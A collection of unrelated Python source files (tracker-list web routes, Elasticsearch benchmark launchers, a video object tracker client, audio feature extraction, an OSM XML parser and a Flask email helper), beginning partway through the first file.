check_all_trackers.start()
return main()
@app.route("/api/add", methods=["POST"])
def new_trackers_api():
new_ts = request.form.get("new_trackers")
if len(new_ts) > max_input_length:
abort(413)
check_all_trackers = Thread(target=trackon.enqueue_new_trackers, args=(new_ts,))
check_all_trackers.daemon = True
check_all_trackers.start()
resp = Response(status=204, headers={"Access-Control-Allow-Origin": "*"})
return resp
@app.route("/submitted")
def submitted():
return render_template(
"submitted.mako",
data=trackon.submitted_data,
size=len(trackon.submitted_trackers),
active="submitted",
)
@app.route("/faq")
def faq():
return render_template("/static/faq.mako", active="faq")
@app.route("/list")
def list_stable():
return render_template("/static/list.mako", active="list")
@app.route("/api")
def api_docs():
return render_template("/static/api-docs.mako", active="api")
@app.route("/raw")
def raw():
return render_template("raw.mako", data=trackon.raw_data, active="raw")
@app.route("/api/<int:percentage>")
def api_percentage(percentage):
include_upv6_only = (
False
if request.args.get("include_ipv6_only_trackers") in ("False", "0")
else True
)
include_upv4_only = (
False
if request.args.get("include_ipv4_only_trackers") in ("False", "0")
else True
)
if 0 <= percentage <= 100:
formatted_list = db.get_api_data(
"percentage", percentage, include_upv6_only, include_upv4_only
)
resp = make_response(formatted_list)
resp = utils.add_api_headers(resp)
return resp
else:
abort(
Response(
"The percentage has to be between 0 an 100",
400,
headers={"Access-Control-Allow-Origin": "*"},
)
)
@app.route("/api/stable")
def api_stable():
return api_percentage(95)
@app.route("/api/best")
def api_best():
return redirect("/api/stable", code=301)
@app.route("/api/all")
def api_all():
return api_percentage(0)
@app.route("/api/live")
@app.route("/api/udp")
@app.route("/api/http")
def api_multiple():
resp = make_response(db.get_api_data(request.path))
resp = utils.add_api_headers(resp)
return resp
@app.route("/about")
def about():
return render_template("/static/about.mako", active="about")
@app.route(
'/<regex(".*(?=\.)"):filename>.<regex("(png|svg|ico)"):filetype>'
) # matches all favicons that should be in root
def favicon(filename, filetype):
return send_from_directory("static/imgs/", filename + "." + filetype)
@app.route(
'/<regex(".*(?=\.)"):filename>.<regex("(xml|json)"):filetype>'
) # matches browserconfig and manifest that should be in root
def app_things(filename, filetype):
return send_from_directory("static/", filename + "." + filetype)
@app.before_request
def reject_announce_requests():
if request.args.get("info_hash"):
return abort(
Response("newTrackon is not a tracker and cannot provide peers", 403)
)
|
launcher.py
|
import logging
import os
import signal
import subprocess
import threading
import shlex
from esrally import config, time, exceptions, client
from esrally.mechanic import telemetry, cluster
from esrally.utils import console, process, jvm
logger = logging.getLogger("rally.launcher")
def wait_for_rest_layer(es, max_attempts=10):
for attempt in range(max_attempts):
import elasticsearch
try:
es.info()
return True
except elasticsearch.TransportError as e:
if e.status_code == 503 or isinstance(e, elasticsearch.ConnectionError):
logger.debug("Elasticsearch REST API is not available yet (probably cluster block).")
time.sleep(2)
elif e.status_code == 401:
logger.debug("Could not authenticate yet (probably x-pack initializing).")
time.sleep(2)
else:
raise e
return False
class ClusterLauncher:
def __init__(self, cfg, metrics_store, client_factory_class=client.EsClientFactory):
self.cfg = cfg
self.metrics_store = metrics_store
self.client_factory = client_factory_class
def start(self):
hosts = self.cfg.opts("client", "hosts")
client_options = self.cfg.opts("client", "options")
es = self.client_factory(hosts, client_options).create()
t = telemetry.Telemetry(devices=[
telemetry.ClusterMetaDataInfo(es),
telemetry.ClusterEnvironmentInfo(es, self.metrics_store),
telemetry.NodeStats(es, self.metrics_store),
telemetry.IndexStats(es, self.metrics_store)
])
# The list of nodes will be populated by ClusterMetaDataInfo, so no need to do it here
c = cluster.Cluster(hosts, [], t)
logger.info("All cluster nodes have successfully started. Checking if REST API is available.")
if wait_for_rest_layer(es, max_attempts=20):
logger.info("REST API is available. Attaching telemetry devices to cluster.")
t.attach_to_cluster(c)
logger.info("Telemetry devices are now attached to the cluster.")
else:
# Just stop the cluster here and raise. The caller is responsible for terminating individual nodes.
logger.error("REST API layer is not yet available. Forcefully terminating cluster.")
self.stop(c)
raise exceptions.LaunchError("Elasticsearch REST API layer is not available. Forcefully terminated cluster.")
return c
def stop(self, c):
c.telemetry.detach_from_cluster(c)
class DockerLauncher:
# May download a Docker image and that can take some time
PROCESS_WAIT_TIMEOUT_SECONDS = 10 * 60
def __init__(self, cfg, metrics_store):
self.cfg = cfg
self.metrics_store = metrics_store
self.binary_paths = {}
self.node_name = None
self.keep_running = self.cfg.opts("mechanic", "keep.running")
def start(self, node_configurations):
nodes = []
for node_configuration in node_configurations:
node_name = node_configuration.node_name
host_name = node_configuration.ip
binary_path = node_configuration.binary_path
self.binary_paths[node_name] = binary_path
p = self._start_process(cmd="docker-compose -f %s up" % binary_path, node_name=node_name, log_dir=node_configuration.log_path)
# only support a subset of telemetry for Docker hosts (specifically, we do not allow users to enable any devices)
node_telemetry = [
telemetry.DiskIo(self.metrics_store, len(node_configurations)),
telemetry.CpuUsage(self.metrics_store),
telemetry.NodeEnvironmentInfo(self.metrics_store)
]
t = telemetry.Telemetry(devices=node_telemetry)
nodes.append(cluster.Node(p, host_name, node_name, t))
return nodes
def _start_process(self, cmd, node_name, log_dir):
startup_event = threading.Event()
p = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL)
t = threading.Thread(target=self._read_output, args=(node_name, p, startup_event))
t.setDaemon(True)
t.start()
if startup_event.wait(timeout=DockerLauncher.PROCESS_WAIT_TIMEOUT_SECONDS):
logger.info("Started node=%s with pid=%s" % (node_name, p.pid))
return p
else:
msg = "Could not start node '%s' within timeout period of %s seconds." % (
node_name, InProcessLauncher.PROCESS_WAIT_TIMEOUT_SECONDS)
logger.error(msg)
raise exceptions.LaunchError("%s Please check the logs in '%s' for more details." % (msg, log_dir))
def _read_output(self, node_name, server, startup_event):
"""
Reads the output from the ES (node) subprocess.
"""
while True:
l = server.stdout.readline().decode("utf-8")
if len(l) == 0:
break
l = l.rstrip()
if l.find("Initialization Failed") != -1:
logger.warning("[%s] has started with initialization errors." % node_name)
startup_event.set()
# don't log each output line as it is contained in the node's log files anyway and we just risk spamming our own log.
if not startup_event.isSet():
logger.info("%s: %s" % (node_name, l.replace("\n", "\n%s (stdout): " % node_name)))
if l.endswith("] started") and not startup_event.isSet():
startup_event.set()
logger.info("[%s] has successfully started." % node_name)
def stop(self, nodes):
if self.keep_running:
logger.info("Keeping Docker container running.")
else:
logger.info("Stopping Docker container")
for node in nodes:
node.telemetry.detach_from_node(node, running=True)
process.run_subprocess_with_logging("docker-compose -f %s down" % self.binary_paths[node.node_name])
node.telemetry.detach_from_node(node, running=False)
class ExternalLauncher:
def __init__(self, cfg, metrics_store, client_factory_class=client.EsClientFactory):
self.cfg = cfg
self.metrics_store = metrics_store
self.client_factory = client_factory_class
def start(self, node_configurations=None):
hosts = self.cfg.opts("client", "hosts")
client_options = self.cfg.opts("client", "options")
es = self.client_factory(hosts, client_options).create()
# cannot enable custom telemetry devices here
t = telemetry.Telemetry(devices=[
# This is needed to actually populate the nodes
telemetry.ClusterMetaDataInfo(es),
# will gather node specific meta-data for all nodes
telemetry.ExternalEnvironmentInfo(es, self.metrics_store),
])
# We create a pseudo-cluster here to get information about all nodes.
# cluster nodes will be populated by the external environment info telemetry device. We cannot know this upfront.
c = cluster.Cluster(hosts, [], t)
user_defined_version = self.cfg.opts("mechanic", "distribution.version", mandatory=False)
distribution_version = es.info()["version"]["number"]
if not user_defined_version or user_defined_version.strip() == "":
logger.info("Distribution version was not specified by user. Rally-determined version is [%s]" % distribution_version)
self.cfg.add(config.Scope.benchmark, "mechanic", "distribution.version", distribution_version)
elif user_defined_version != distribution_version:
console.warn(
"Specified distribution version '%s' on the command line differs from version '%s' reported by the cluster." %
(user_defined_version, distribution_version), logger=logger)
t.attach_to_cluster(c)
return c.nodes
def stop(self, nodes):
# nothing to do here, externally provisioned clusters / nodes don't have any specific telemetry devices attached.
pass
class InProcessLauncher:
"""
Launcher is responsible for starting and stopping the benchmark candidate.
"""
PROCESS_WAIT_TIMEOUT_SECONDS = 90.0
def __init__(self, cfg, metrics_store, races_root_dir, clock=time.Clock):
self.cfg = cfg
self.metrics_store = metrics_store
self._clock = clock
self.races_root_dir = races_root_dir
self.java_home = self.cfg.opts("runtime", "java.home")
self.keep_running = self.cfg.opts("mechanic", "keep.running")
def start(self, node_configurations):
# we're very specific which nodes we kill as there is potentially also an Elasticsearch based metrics store running on this machine
# The only specific trait of a Rally-related process is that is started "somewhere" in the races root directory.
#
# We also do this only once per host otherwise we would kill instances that we've just launched.
process.kill_running_es_instances(self.races_root_dir)
java_major_version = jvm.major_version(self.java_home)
logger.info("Detected Java major version [%s]." % java_major_version)
node_count_on_host = len(node_configurations)
return [self._start_node(node_configuration, node_count_on_host, java_major_version) for node_configuration in node_configurations]
def _start_node(self, node_configuration, node_count_on_host, java_major_version):
host_name = node_configuration.ip
node_name = node_configuration.node_name
car = node_configuration.car
binary_path = node_configuration.binary_path
data_paths = node_configuration.data_paths
node_telemetry_dir = "%s/telemetry" % node_configuration.node_root_path
logger.info("Starting node [%s] based on car [%s]." % (node_name, car))
enabled_devices = self.cfg.opts("mechanic", "telemetry.devices")
node_telemetry = [
telemetry.FlightRecorder(node_telemetry_dir, java_major_version),
telemetry.JitCompiler(node_telemetry_dir),
telemetry.Gc(node_telemetry_dir, java_major_version),
telemetry.PerfStat(node_telemetry_dir),
telemetry.DiskIo(self.metrics_store, node_count_on_host),
telemetry.CpuUsage(self.metrics_store),
telemetry.NodeEnvironmentInfo(self.metrics_store),
telemetry.IndexSize(data_paths, self.metrics_store),
telemetry.MergeParts(self.metrics_store, node_configuration.log_path),
]
t = telemetry.Telemetry(enabled_devices, devices=node_telemetry)
env = self._prepare_env(car, node_name, t)
node_process = self._start_process(env, node_name, binary_path)
node = cluster.Node(node_process, host_name, node_name, t)
logger.info("Node [%s] has successfully started. Attaching telemetry devices." % node_name)
t.attach_to_node(node)
logger.info("Telemetry devices are now attached to node [%s]." % node_name)
return node
def _prepare_env(self, car, node_name, t):
env = {}
env.update(os.environ)
env.update(car.env)
# Unix specific!:
self._set_env(env, "PATH", "%s/bin" % self.java_home, separator=":")
# Don't merge here!
env["JAVA_HOME"] = self.java_home
# we just blindly trust telemetry here...
for k, v in t.instrument_candidate_env(car, node_name).items():
self._set_env(env, k, v)
exit_on_oome_flag = "-XX:+ExitOnOutOfMemoryError"
if jvm.supports_option(self.java_home, exit_on_oome_flag):
logger.info("JVM supports [%s]. Setting this option to detect out of memory errors during the benchmark." % exit_on_oome_flag)
self._set_env(env, "ES_JAVA_OPTS", exit_on_oome_flag)
else:
logger.info("JVM does not support [%s]. Cannot detect out of memory errors. Please consider a JDK upgrade." % exit_on_oome_flag)
logger.info("env for [%s]: %s" % (node_name, str(env)))
return env
def _set_env(self, env, k, v, separator=' '):
if v is not None:
if k not in env:
env[k] = v
else: # merge
env[k] = v + separator + env[k]
def _start_process(self, env, node_name, binary_path):
if os.geteuid() == 0:
raise exceptions.LaunchError("Cannot launch Elasticsearch as root. Please run Rally as a non-root user.")
os.chdir(binary_path)
startup_event = threading.Event()
cmd = ["bin/elasticsearch"]
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL, env=env)
t = threading.Thread(target=self._read_output, args=(node_name, process, startup_event))
t.setDaemon(True)
t.start()
if startup_event.wait(timeout=InProcessLauncher.PROCESS_WAIT_TIMEOUT_SECONDS):
process.poll()
# has the process terminated?
if process.returncode:
msg = "Node [%s] has terminated with exit code [%s]." % (node_name, str(process.returncode))
logger.error(msg)
raise exceptions.LaunchError(msg)
else:
logger.info("Started node [%s] with PID [%s]" % (node_name, process.pid))
return process
else:
msg = "Could not start node [%s] within timeout period of [%s] seconds." % (
node_name, InProcessLauncher.PROCESS_WAIT_TIMEOUT_SECONDS)
# check if the process has terminated already
process.poll()
if process.returncode:
msg += " The process has already terminated with exit code [%s]." % str(process.returncode)
else:
msg += " The process seems to be still running with PID [%s]." % process.pid
logger.error(msg)
raise exceptions.LaunchError(msg)
def _read_output(self, node_name, server, startup_event):
"""
Reads the output from the ES (node) subprocess.
"""
while True:
l = server.stdout.readline().decode("utf-8")
if len(l) == 0:
# no more output -> the process has terminated. We can give up now
startup_event.set()
break
l = l.rstrip()
# don't log each output line as it is contained in the node's log files anyway and we just risk spamming our own log.
if not startup_event.isSet():
logger.info("%s: %s" % (node_name, l.replace("\n", "\n%s (stdout): " % node_name)))
if l.find("Initialization Failed") != -1 or l.find("A fatal exception has occurred") != -1:
logger.error("[%s] encountered initialization errors." % node_name)
startup_event.set()
if l.endswith("started") and not startup_event.isSet():
startup_event.set()
logger.info("[%s] has successfully started." % node_name)
def stop(self, nodes):
if self.keep_running:
logger.info("Keeping [%d] nodes on this host running." % len(nodes))
else:
logger.info("Shutting down [%d] nodes on this host." % len(nodes))
for node in nodes:
process = node.process
node_name = node.node_name
node.telemetry.detach_from_node(node, running=True)
if not self.keep_running:
stop_watch = self._clock.stop_watch()
stop_watch.start()
os.kill(process.pid, signal.SIGINT)
try:
process.wait(10.0)
logger.info("Done shutdown node [%s] in [%.1f] s." % (node_name, stop_watch.split_time()))
except subprocess.TimeoutExpired:
# kill -9
logger.warning("Node [%s] did not shut down itself after 10 seconds; now kill -QUIT node, to see threads:" % node_name)
try:
os.kill(process.pid, signal.SIGQUIT)
except OSError:
logger.warning("No process found with PID [%s] for node [%s]" % (process.pid, node_name))
break
try:
process.wait(120.0)
logger.info("Done shutdown node [%s] in [%.1f] s." % (node_name, stop_watch.split_time()))
break
except subprocess.TimeoutExpired:
pass
logger.info("kill -KILL node [%s]" % node_name)
try:
process.kill()
except ProcessLookupError:
logger.warning("No process found with PID [%s] for node [%s]" % (process.pid, node_name))
node.telemetry.detach_from_node(node, running=False)
|
tracker-co.py
|
#!/usr/bin/env python
# Tracking related
import dlib, cv2
import numpy as np
# Basic Modules
import os, sys
import argparse
from threading import Thread
from logIO import logCreate
# HTTP related
import requests
# Cloud Server
URL = 'http://yaolaoban.eva0.nics.cc:5000/correlate'
# global varibles
this_file_path = os.path.dirname(os.path.abspath(__file__))
imdb_name = 'Jumping'
imdb_path = os.path.join(this_file_path, 'img', imdb_name)
_, _, files = os.walk(imdb_path).next()
img_count = len(files) - 1
i = 1
# IMG, BOX and status
showimg = False
updated = True
updtbox = [0,0,0,0]
oldbox = [0,0,0,0]
crtbox = [0,0,0,0]
# Tracker
tracker = dlib.correlation_tracker()
def adjust_box(actbox, oldbox, crtbox):
'''input:
1. actbox (Actual Box) : the bbox returned by the server
2. oldbox (Old Box) : the bbox of img sent to server
3. crtbox (Current Box): the bbox now returned by tracker
output:
1. newbox (New Box) : the adjusted bbox
'''
newbox = actbox
newbox[0] += crtbox[0] - oldbox[0]
newbox[1] += crtbox[1] - oldbox[1]
newbox[2] += crtbox[2] - oldbox[2]
newbox[3] += crtbox[3] - oldbox[3]
return newbox
def showIMG(img, box, time=10):
cv2.rectangle(img, box[0:1], box[2:3],
(255,255,255), 2)
cv2.imshow('Image', img)
cv2.waitKey(time)
def encode_box(box):
'''encode a box (a list of 4 ints) for posting'''
en_box = {
'L' : box[0],
'U' : box[1],
'R' : box[2],
'B' : box[3]}
return en_box
def postIMG():
global i
global updated
global updtbox, oldbox, crtbox
f = open(imdb_path+'/%04d.jpg'%i)
r = requests.post(url=URL,
data=encode_box(crtbox),
files={'img':f})
updtbox = r.json()['bbox']
updtbox = adjust_box(updtbox, oldbox, crtbox)
updated = True
f.close()
return
def start_tracking():
global updated
global i, img_count
global updtbox, oldbox, crtbox
while i <= img_count:
# get a new frame
img = cv2.imread(imdb_path+'/%04d.jpg'%i)
# update the tracker
if updated:
# tracker.start_track()
tracker.start_track(img,
dlib.rectangle(*updtbox))
oldbox = updtbox
updated = False
# post a new frame
trd_post = Thread(target=postIMG)
trd_post.start()
else:
# tracker.update()
tracker.update(img)
rect = tracker.get_position()
pt1 = [int(rect.left()), int(rect.top())]
pt2 = [int(rect.right()),int(rect.bottom())]
crtbox = pt1 + pt2
f.write(str(crtbox)+'\n')
if i%10 == 0:
print 'frame',i,'returns',crtbox
if showimg:
showIMG(img, crtbox, 2000)
# next frame
i +=1
def init_firstframe_by_detection():
pass
def init_firstframe_by_grdtruth():
global updtbox, oldbox, crtbox
gtfile = open(imdb_path+'/'+'groundtruth_rect.txt','r')
line = gtfile.readline()
points = line[:-1].split(',')
points = map(int, points)
points[2] += points[0]
points[3] += points[1]
gtfile.close()
crtbox = points
updtbox = crtbox
oldbox = crtbox
img = cv2.imread(imdb_path+'/0001.jpg')
tracker.start_track(img, dlib.rectangle(*crtbox))
def parse_args():
'''Parse input arguments.'''
parser = argparse.ArgumentParser(description='Terminal')
parser.add_argument('--local', dest='LOCAL',
help='run on local server',
action='store_true')
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
#if args.LOCAL:
URL = 'http://0.0.0.0:5000/correlate'
print 'Start tracking',imdb_name
f = logCreate()
f.write(imdb_name+'correlate\n')
init_firstframe_by_grdtruth()
start_tracking()
print 'Tracking finished, log file:',f.name
|
NotificationConectaIT.py
|
#!/usr/bin/python3
import os
import sys
import json
import psutil
import subprocess
pid = os.getpid()
for proc in psutil.process_iter(['pid', 'name']):
#jsonDecodeProc = json.loads(proc)
#if(jsonDecodeProc['name'] == 'ConectaIT.exe'):
inf = json.dumps(proc.info)
inf2 = json.loads(inf)
if(inf2['name'] == 'NotificationConectaIT.exe' and inf2['pid'] != pid):
subprocess.call('taskkill /F /PID '+str(inf2['pid']))
from modules.NotificationIniciarJornada import *
from modules.NotificationFimJornada import *
dir_path = ""
try:
notificationjornada = Thread(target=NotificationIniciarJornada, args=[dir_path])
notificationjornada.start()
notificationfimjornada = Thread(target=NotificationFimJornada, args=[dir_path])
notificationfimjornada.start()
except:
sys.exit()
|
wav_to_fbank.py
|
#!/usr/bin/env python3
# encoding: utf-8
# Copyright 2019 Thai-Son Nguyen
# Licensed under the Apache License, Version 2.0 (the "License")
import os
import argparse
import multiprocessing
import numpy as np
from scipy.io import wavfile
from pynn.util import audio
from pynn.io import kaldi_io
def write_ark_thread(segs, out_ark, out_scp, args):
fbank_mat = audio.filter_bank(args.sample_rate, args.nfft, args.fbank)
cache_wav = ''
for seg in segs:
tokens = seg.split()
if args.seg_info:
wav, start, end = tokens[:3]
seg_name = '%s-%06.f-%06.f' % (wav, float(start)*100, float(end)*100)
else:
if len(tokens) == 1: tokens.append(tokens[0])
if len(tokens) == 2: tokens.extend(['0.0', '0.0'])
seg_name, wav, start, end = tokens[:4]
start, end = float(start), float(end)
if args.wav_path is not None:
wav = wav if wav.endswith('.wav') else wav + '.wav'
wav = args.wav_path + '/' + wav
if cache_wav != wav:
if not os.path.isfile(wav):
print('File %s does not exist' % wav)
continue
sample_rate, signal = wavfile.read(wav)
if sample_rate != args.sample_rate:
print('Wav %s is not in desired sample rate' % wav)
continue
cache_wav = wav
start = int(start * sample_rate)
end = -1 if end <= 0. else int(end * sample_rate)
if start >= len(signal) or start >= end:
print('Wrong segment %s' % seg_name)
continue
feats = audio.extract_fbank(signal[start:end], fbank_mat, sample_rate=sample_rate, nfft=args.nfft)
if len(feats) > args.max_len or len(feats) < args.min_len:
continue
if args.mean_norm:
feats = feats - feats.mean(axis=0, keepdims=True)
if args.fp16:
feats = feats.astype(np.float16)
dic = {seg_name: feats}
kaldi_io.write_ark(out_ark, dic, out_scp, append=True)
parser = argparse.ArgumentParser(description='pynn')
parser.add_argument('--seg-desc', help='segment description file', required=True)
parser.add_argument('--seg-info', help='append timestamps to the segment names', action='store_true')
parser.add_argument('--wav-path', help='path to wav files', type=str, default=None)
parser.add_argument('--sample-rate', help='sample rate', type=int, default=16000)
parser.add_argument('--fbank', help='number of filter banks', type=int, default=40)
parser.add_argument('--nfft', help='number of FFT points', type=int, default=256)
parser.add_argument('--max-len', help='maximum frames for a segment', type=int, default=10000)
parser.add_argument('--min-len', help='minimum frames for a segment', type=int, default=4)
parser.add_argument('--mean-norm', help='mean substraction', action='store_true')
parser.add_argument('--fp16', help='use float16 instead of float32', action='store_true')
parser.add_argument('--output', help='output file', type=str, default='data')
parser.add_argument('--jobs', help='number of parallel jobs', type=int, default=1)
if __name__ == '__main__':
args = parser.parse_args()
segs = [line.rstrip('\n') for line in open(args.seg_desc, 'r')]
size = len(segs) // args.jobs
jobs = []
j = 0
for i in range(args.jobs):
l = len(segs) if i == (args.jobs-1) else j+size
sub_segs = segs[j:l]
j += size
out_ark = '%s.%d.ark' % (args.output, i)
out_scp = '%s.%d.scp' % (args.output, i)
process = multiprocessing.Process(
target=write_ark_thread, args=(sub_segs, out_ark, out_scp, args))
process.start()
jobs.append(process)
for job in jobs: job.join()
|
multiproc.py
|
# Copyright 2011 Omniscale GmbH & Co. KG
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mmap
import multiprocessing
import re
from queue import Empty
from imposm.parser.xml.parser import XMLParser
from imposm.parser.util import setproctitle
KiB = 1024
MiB = 1024*KiB
READ_SIZE = 512*KiB
class MMapReader(object):
def __init__(self, m, size):
self.m = m
self.m.seek(0)
self.size = size
def read(self, size=None):
if size is None:
size = self.size - self.m.tell()
else:
size = min(self.size - self.m.tell(), size)
return self.m.read(size)
def readline(self):
cur_pos = self.m.tell()
if cur_pos >= self.size:
return
nl_pos = self.m.find('\n')
self.m.seek(cur_pos)
return self.m.read(nl_pos-cur_pos)
def seek(self, n):
self.m.seek(n)
class XMLParserProcess(XMLParser, multiprocessing.Process):
def __init__(self, mmap_pool, mmap_queue, *args, **kw):
multiprocessing.Process.__init__(self)
XMLParser.__init__(self, *args, **kw)
self.daemon = True
self.mmap_pool = mmap_pool
self.mmap_queue = mmap_queue
def run(self):
setproctitle('imposm xml parser')
while True:
mmap_idx, size = self.mmap_queue.get()
if mmap_idx is None:
self.mmap_queue.task_done()
break
xml = MMapReader(self.mmap_pool.get(mmap_idx), size)
self.parse(xml)
self.mmap_queue.task_done()
self.mmap_pool.free(mmap_idx)
class XMLMultiProcParser(object):
nodes_tag_filter = None
ways_tag_filter = None
relations_tag_filter = None
def __init__(self, pool_size, nodes_queue=None, ways_queue=None,
relations_queue=None, coords_queue=None, marshal_elem_data=False):
self.pool_size = pool_size
self.pool = []
self.nodes_callback = nodes_queue.put if nodes_queue else None
self.ways_callback = ways_queue.put if ways_queue else None
self.relations_callback = relations_queue.put if relations_queue else None
self.coords_callback = coords_queue.put if coords_queue else None
xml_chunk_size=READ_SIZE
self.mmap_pool = MMapPool(pool_size*8, xml_chunk_size*8)
self.mmap_queue = multiprocessing.JoinableQueue(8)
self.marshal_elem_data = marshal_elem_data
def parse(self, stream):
assert not self.pool
for _ in range(self.pool_size):
proc = XMLParserProcess(self.mmap_pool, self.mmap_queue, nodes_callback=self.nodes_callback,
coords_callback=self.coords_callback, ways_callback=self.ways_callback,
relations_callback=self.relations_callback,
nodes_tag_filter=self.nodes_tag_filter,
ways_tag_filter=self.ways_tag_filter,
relations_tag_filter=self.relations_tag_filter,
marshal_elem_data=self.marshal_elem_data,
)
self.pool.append(proc)
proc.start()
chunker = XMLChunker(stream, self.mmap_pool, xml_chunk_size=READ_SIZE)
chunker.read(self.mmap_queue, coords_callback=self.coords_callback)
self.mmap_queue.join()
for proc in self.pool:
self.mmap_queue.put((None, None))
for proc in self.pool:
proc.join()
class MMapPool(object):
"""
Manages multiple mmap files.
The mmap files can be read and written in different processes.
"""
def __init__(self, n, mmap_size):
self.n = n
self.mmap_size = mmap_size
self.pool = [mmap.mmap(-1, mmap_size) for _ in range(n)]
self.free_mmaps = set(range(n))
self.free_queue = multiprocessing.JoinableQueue()
def new(self):
"""
Return a free mmap file.
:returns: index, mmap file
"""
if not self.free_mmaps:
self.free_mmaps.add(self.free_queue.get())
self.free_queue.task_done()
while True:
# fetch unless free_queue is empty
try:
self.free_mmaps.add(self.free_queue.get_nowait())
self.free_queue.task_done()
except Empty:
break
mmap_idx = self.free_mmaps.pop()
return mmap_idx, self.pool[mmap_idx]
def join(self):
while len(self.free_mmaps) < self.n:
self.free_mmaps.add(self.free_queue.get())
self.free_queue.task_done()
def get(self, idx):
"""
Return mmap file with `idx`.
"""
return self.pool[idx]
def free(self, idx):
"""
Mark mmap file with `idx` as free.
"""
self.free_queue.put(idx)
class XMLChunker(object):
"""
Reads and chunks OSM XML file.
Reads OSM XML from `stream` and writes chunks of it into mmap files from
the `mmap_pool`.
:params xml_chunk_size: chunk XML after this many bytes
"""
def __init__(self, stream, mmap_pool, xml_chunk_size):
self.stream = stream
self.size = xml_chunk_size
self._last_line = None
self.mmap_pool = mmap_pool
self.current_mmap_idx = 0
self._skip_header()
def _skip_header(self):
for line in self.stream:
if line.lstrip().startswith('<node '):
self._last_line = line
return
def _new_xml_outstream(self):
self.current_mmap_idx, stream = self.mmap_pool.new()
stream.seek(0)
stream.write("<osm xmlns:xapi='http://www.informationfreeway.org/xapi/0.6'>")
return stream
def _finished_xml_outstream(self, last_line, stream):
if '</osm' not in last_line:
stream.write('</osm>\n')
return self.current_mmap_idx, stream.tell()
def read(self, mmaps_queue, coords_callback=None):
"""
Read and chunk all
"""
coord_node_match = None
xml_nodes = self._new_xml_outstream()
coords = []
coord_node_re_match = re.compile(r'^\s*<node id="(\d+)" .*lat="([-0-9.]+)" '
'lon="([-0-9.]+)".*/>').match
node_re_match = re.compile(r'^\s*<node .*/>').match
xml_nodes.write(self._last_line)
split = False
line = ''
for line in self.stream:
if coords_callback:
coord_node_match = coord_node_re_match(line)
if coord_node_match:
osm_id, lat, lon = coord_node_match.groups()
coords.append((int(osm_id), float(lon), float(lat)))
if len(coords) >= 512:
coords_callback(coords)
coords = []
else:
xml_nodes.write(line)
else:
xml_nodes.write(line)
if split:
if (line.rstrip().endswith(('</way>', '</node>', '</relation>'))
or (coords_callback and coord_node_match)
or (not coords_callback and node_re_match(line))):
mmaps_queue.put(self._finished_xml_outstream(line, xml_nodes))
xml_nodes = self._new_xml_outstream()
split = False
elif xml_nodes.tell() > self.size:
split = True
if coords_callback:
coords_callback(coords)
# we are at the end of the stream and assume we wrote the end tag
# to xml_nodes. we set line to closing tag here to avoid additional
# end tag in case the last line(s) is blank
line = '</osm'
mmaps_queue.put(self._finished_xml_outstream(line, xml_nodes))
if __name__ == '__main__':
import sys
def count_proc(type, queue):
def count():
count = 0
while True:
nodes = queue.get()
if nodes is None:
queue.task_done()
break
count += len(nodes)
queue.task_done()
print(type, count)
return count
nodes_queue = multiprocessing.JoinableQueue(128)
ways_queue = multiprocessing.JoinableQueue(128)
relations_queue = multiprocessing.JoinableQueue(128)
procs = [
multiprocessing.Process(target=count_proc('nodes', nodes_queue)),
multiprocessing.Process(target=count_proc('ways', ways_queue)),
multiprocessing.Process(target=count_proc('relations', relations_queue))
]
for proc in procs:
proc.start()
parser = XMLMultiProcParser(open(sys.argv[1]), 2, nodes_queue=nodes_queue,
ways_queue=ways_queue, relations_queue=relations_queue)
parser.start()
nodes_queue.put(None)
nodes_queue.join()
ways_queue.put(None)
ways_queue.join()
relations_queue.put(None)
relations_queue.join()
for proc in procs:
proc.join()
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from flask_mail import Mail
from app import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['MAIL_SUBJECT_PREFIX'] + ': ' + subject,
sender=app.config['MAIL_DEFAULT_SENDER'] , recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
channel_handler.py
|
# =======================================================================
#
# Copyright (C) 2018, Hisilicon Technologies Co., Ltd. All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1 Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2 Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3 Neither the names of the copyright holders nor the names of the
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# =======================================================================
#
"""presenter channel manager module"""
import time
import logging
import threading
from threading import get_ident
from common.channel_manager import ChannelManager
# thread event timeout, The unit is second.
WEB_EVENT_TIMEOUT = 2
